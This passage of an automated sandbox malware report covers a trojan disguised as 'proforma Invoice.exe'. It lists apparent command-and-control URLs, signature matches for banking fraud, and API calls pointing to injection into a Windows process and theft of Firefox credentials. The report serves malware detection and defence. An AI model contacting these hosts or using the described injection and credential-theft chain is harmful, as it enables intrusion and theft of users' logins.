                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 07 Nov 2024 09:12:21 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 07 Nov 2024 09:12:23 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 07 Nov 2024 09:12:26 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 07 Nov 2024 09:12:28 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Nov 2024 09:12:48 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Nov 2024 09:12:51 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Nov 2024 09:12:53 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 07 Nov 2024 09:12:56 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>
                Source: EhStorAuthn.exe, 00000006.00000002.4499739121.000000000593E000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003B7E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://roopiedutech.online/7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMd
                Source: EhStorAuthn.exe, 00000006.00000002.4499739121.0000000005AD0000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003D10000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://seikai.click/c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6
                Source: kYuxUXtJmKaZ.exe, 00000008.00000002.4500691276.0000000005491000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nutrigenfit.online
                Source: kYuxUXtJmKaZ.exe, 00000008.00000002.4500691276.0000000005491000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nutrigenfit.online/xtuc/
                Source: EhStorAuthn.exe, 00000006.00000002.4499739121.00000000052F6000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003536000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.seraph.best/
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000839000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000839000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000839000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000839000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: EhStorAuthn.exe, 00000006.00000003.2660368282.0000000007AB4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                Source: Yara match | File source: 3.2.proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 3.2.proforma Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample | Static PE information: Filename: proforma Invoice.exe
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_0042C653 NtClose,3_2_0042C653
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2B60 NtClose,LdrInitializeThunk,3_2_011A2B60
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_011A2DF0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_011A2C70
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A35C0 NtCreateMutant,LdrInitializeThunk,3_2_011A35C0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A4340 NtSetContextThread,3_2_011A4340
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A4650 NtSuspendThread,3_2_011A4650
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2B80 NtQueryInformationFile,3_2_011A2B80
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2BA0 NtEnumerateValueKey,3_2_011A2BA0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2BF0 NtAllocateVirtualMemory,3_2_011A2BF0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2BE0 NtQueryValueKey,3_2_011A2BE0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2AB0 NtWaitForSingleObject,3_2_011A2AB0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2AD0 NtReadFile,3_2_011A2AD0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2AF0 NtWriteFile,3_2_011A2AF0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2D10 NtMapViewOfSection,3_2_011A2D10
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2D00 NtSetInformationFile,3_2_011A2D00
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2D30 NtUnmapViewOfSection,3_2_011A2D30
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2DB0 NtEnumerateKey,3_2_011A2DB0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2DD0 NtDelayExecution,3_2_011A2DD0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2C00 NtQueryInformationProcess,3_2_011A2C00
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2C60 NtCreateKey,3_2_011A2C60
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2CA0 NtQueryInformationToken,3_2_011A2CA0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2CC0 NtQueryVirtualMemory,3_2_011A2CC0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2CF0 NtOpenProcess,3_2_011A2CF0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2F30 NtCreateSection,3_2_011A2F30
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2F60 NtCreateProcessEx,3_2_011A2F60
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2F90 NtProtectVirtualMemory,3_2_011A2F90
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2FB0 NtResumeThread,3_2_011A2FB0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2FA0 NtQuerySection,3_2_011A2FA0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2FE0 NtCreateFile,3_2_011A2FE0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2E30 NtWriteVirtualMemory,3_2_011A2E30
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2E80 NtReadVirtualMemory,3_2_011A2E80
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2EA0 NtAdjustPrivilegesToken,3_2_011A2EA0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A2EE0 NtQueueApcThread,3_2_011A2EE0
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A3010 NtOpenDirectoryObject,3_2_011A3010
                Source: C:\Users\user\Desktop\proforma Invoice.exe | Code function: 3_2_011A3090 NtSetValueKey,3_2_011A3090
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C4650 NtSuspendThread,LdrInitializeThunk,6_2_047C4650
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C4340 NtSetContextThread,LdrInitializeThunk,6_2_047C4340
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_047C2C70
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2C60 NtCreateKey,LdrInitializeThunk,6_2_047C2C60
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_047C2CA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_047C2D30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_047C2D10
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_047C2DF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2DD0 NtDelayExecution,LdrInitializeThunk,6_2_047C2DD0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_047C2EE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_047C2E80
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2F30 NtCreateSection,LdrInitializeThunk,6_2_047C2F30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2FE0 NtCreateFile,LdrInitializeThunk,6_2_047C2FE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2FB0 NtResumeThread,LdrInitializeThunk,6_2_047C2FB0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2AF0 NtWriteFile,LdrInitializeThunk,6_2_047C2AF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2AD0 NtReadFile,LdrInitializeThunk,6_2_047C2AD0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2B60 NtClose,LdrInitializeThunk,6_2_047C2B60
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_047C2BF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_047C2BE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_047C2BA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C35C0 NtCreateMutant,LdrInitializeThunk,6_2_047C35C0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C39B0 NtGetContextThread,LdrInitializeThunk,6_2_047C39B0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2C00 NtQueryInformationProcess,6_2_047C2C00
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2CF0 NtOpenProcess,6_2_047C2CF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2CC0 NtQueryVirtualMemory,6_2_047C2CC0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2D00 NtSetInformationFile,6_2_047C2D00
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2DB0 NtEnumerateKey,6_2_047C2DB0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2E30 NtWriteVirtualMemory,6_2_047C2E30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2EA0 NtAdjustPrivilegesToken,6_2_047C2EA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2F60 NtCreateProcessEx,6_2_047C2F60
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2FA0 NtQuerySection,6_2_047C2FA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2F90 NtProtectVirtualMemory,6_2_047C2F90
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2AB0 NtWaitForSingleObject,6_2_047C2AB0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2B80 NtQueryInformationFile,6_2_047C2B80
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C3010 NtOpenDirectoryObject,6_2_047C3010
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C3090 NtSetValueKey,6_2_047C3090
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C3D70 NtOpenThread,6_2_047C3D70
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C3D10 NtOpenProcessToken,6_2_047C3D10
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_00709060 NtClose,6_2_00709060
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_007091D0 NtAllocateVirtualMemory,6_2_007091D0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_00708D60 NtCreateFile,6_2_00708D60
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_00708ED0 NtReadFile,6_2_00708ED0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_00708FC0 NtDeleteFile,6_2_00708FC0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 0115B970 appears 177 times
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 011B7E54 appears 69 times
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 011DEA12 appears 73 times
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 011EF290 appears 96 times
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: String function: 011A5130 appears 33 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 047C5130 appears 40 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 0477B970 appears 274 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 047D7E54 appears 99 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 047FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: String function: 0480F290 appears 105 times
                Source: proforma Invoice.exe, 00000000.00000000.2041228009.0000000000ACC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAQae.exe" vs proforma Invoice.exe
                Source: proforma Invoice.exe, 00000000.00000002.2066272292.0000000007620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs proforma Invoice.exe
                Source: proforma Invoice.exe, 00000000.00000002.2051666042.00000000010EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs proforma Invoice.exe
                Source: proforma Invoice.exe, 00000003.00000002.2475930945.000000000125D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs proforma Invoice.exe
                Source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEhStorAuthn.exej% vs proforma Invoice.exe
                Source: proforma Invoice.exeBinary or memory string: OriginalFilenameAQae.exe" vs proforma Invoice.exe
                Source: proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: proforma Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.proforma Invoice.exe.49e9198.0.raw.unpack, CemaC0EQg1IJaEF3y9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.proforma Invoice.exe.4961978.1.raw.unpack, CemaC0EQg1IJaEF3y9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, pAdSVAtSJwrJrQ6sVq.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.proforma Invoice.exe.7620000.5.raw.unpack, CemaC0EQg1IJaEF3y9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@12/9
                Source: C:\Users\user\Desktop\proforma Invoice.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\proforma Invoice.exe.log
                Source: C:\Users\user\Desktop\proforma Invoice.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile created: C:\Users\user\AppData\Local\Temp\s002-5p
                Source: proforma Invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: EhStorAuthn.exe, 00000006.00000003.2664472670.0000000000899000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2664429862.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000899000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4497404276.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: proforma Invoice.exe ReversingLabs: Detection: 52%
                Source: unknown Process created: C:\Users\user\Desktop\proforma Invoice.exe "C:\Users\user\Desktop\proforma Invoice.exe"
                Source: C:\Users\user\Desktop\proforma Invoice.exe Process created: C:\Users\user\Desktop\proforma Invoice.exe "C:\Users\user\Desktop\proforma Invoice.exe"
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\proforma Invoice.exe Process created: C:\Users\user\Desktop\proforma Invoice.exe "C:\Users\user\Desktop\proforma Invoice.exe"
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\proforma Invoice.exe Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: profapi.dll
